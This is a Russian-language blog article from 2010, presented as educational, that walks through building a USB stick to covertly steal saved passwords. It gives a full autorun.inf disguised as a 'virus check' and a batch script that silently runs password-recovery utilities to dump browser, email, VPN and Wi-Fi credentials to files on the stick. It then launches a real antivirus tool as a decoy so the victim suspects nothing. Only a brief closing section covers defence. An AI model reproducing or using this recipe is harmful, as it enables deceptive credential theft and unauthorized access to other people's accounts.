Сделать стартовойДобавить в закладки  
Главная страничка Главная страничка
В номере:

    Выходит с 17 июля 2008 г. цена договорная

    Опрос

    gismeteo.ru
    Погода на Яндексе
    pogoda.ru
    meteonova.ru
    по телевизору
    за окном
    в газете
    а че его смотреть?
    в другом месте
    по счетчику гейгера



    Календарь
    «    Июнь 2010    »
    ПнВтСрЧтПтСбВс
     123456
    78910111213
    14151617181920
    21222324252627
    282930 

    Архив новостей
    Март 2022 (1)
    Декабрь 2021 (1)
    Август 2021 (1)
    Июль 2021 (3)
    Февраль 2021 (3)
    Январь 2021 (1)

    Информация
    Как можно украсть пароли с компьютера
    Хак, безопасность
    автор: dimon, опубликовано: 28 июня 2010

    Данная статья написана исключительно в ознакомительных целях.
    Ее назначение - защита ваших данных от злоумышленника.
    Кто осведомлен, тот вооружен!


    Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!



    Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила.

    Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.



    Скачаем Password Recovery утилиты, которые нам потребуются:

    * MessenPass — восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;

    * Mail PassView — извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;

    * IE Passview — отображает логины и пароли, сохраненные "осликом";

    * ChromePass — отображает логины и пароли, сохраненные браузером Google Chrom;

    * PasswordFox — получает все пароли, сохраненные Firefox'oм;

    * Protected Storage PassView — восстанавливает все пароли, сохраненные в защищенном хранилище;

    * Dialupass — вытаскивает все пароли dialup/VPN сессий;

    * Network Password Recovery — отображает пароли которые вы используете для шар в локальной сети а так же пароли .NET Passport/Messenger account;

    * PstPassword — извлекает пароли из файлов личных папок Outlook - .PST;

    * WirelessKeyView — восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере.

    Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор.
    Все утилиты можно взять тут.

    Еще нам необходима утилитка Hidden Start (hstart).

    Так же скачаем KidoKiller для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране.




    Подготавливаем флэшку.

    1. Создаем на флэшке две папки:
    флэшка:\prog\
    флэшка:\prog\log\

    2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

    3. В корне флешки создаем autorun.inf со следующим содержанием:
    [autorun]
    open=prog/hstart /NOCONSOLE "launch.bat"
    ACTION= Проверить комп на вирусы

    Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

    4. Создаем батник launch.bat:
    echo off
    echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
    start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
    start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
    start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
    start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
    start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
    start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
    start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
    start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
    start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

    If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
    start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
    :End
    start prog/KK.exe


    Рассмотрим команды батника поподробнее:

    echo off – запрет на вывод в окно CMD результатов выполнения

    echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

    start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

    Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

    start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

    Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.




    Как же бороться?

    1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet.

    2. Отключить авторан для флэшек и следить, чтобы ваши посетители не запускали никаких "очень важных" утилит с флэшки.

    3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит.




    Поводом для написания этой статьи стала заметка в журнале "Хакер".


    Данная статья написана исключительно в ознакомительных целях.
    Ее назначение - защита ваших данных от злоумышленника.
    Кто осведомлен, тот вооружен!


    Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

     
    Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Чтобы Вам были доступны все функции Вам необходимо либо зарегистрироваться, либо зайти на сайт под своим именем.

    Другие новости по теме:

  • Включение поддержки UNC в CMD
  • Бэкап флэшки в rar-архив
  • Автоматизация установки ethernet принтеров
  • Автоматизация psexec.exe
  • Миграция с Linux (samba+LDAP) на Windows Server 2003 Active Directory


  • Комментарии:

    Оставить комментарий



     
    Информация
     
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.


    Поиск по сайту:


    Облако тегов
    Android, Arduino, backup, CentOS, cmd, div, DLE, DLE хаки, domoticz, dzvents, event, Home Assistant, Linux, log, LUA, Monster, ogf3, RDP, Template, VBS, windows, WSH, бумага, бумажный самолетик, верстка, иструкция, Карты, кино, Навигация, оригами, программа, рецензия, рецепт, скрипт, уведомления, фигуры, шаблон, Яндекс, яндекс-карты

    Показать все теги
    Реклама
    раскрутка сайта бесплатно
    Главная страница | Регистрация | Добавить новость | Новое на сайте | Статистика | Поддержка | Правила ресурса Copyright © 2005-2021 by dimon - all right reserved!
    Тираж:           экземпляров.   Дизайн, верстка by dimon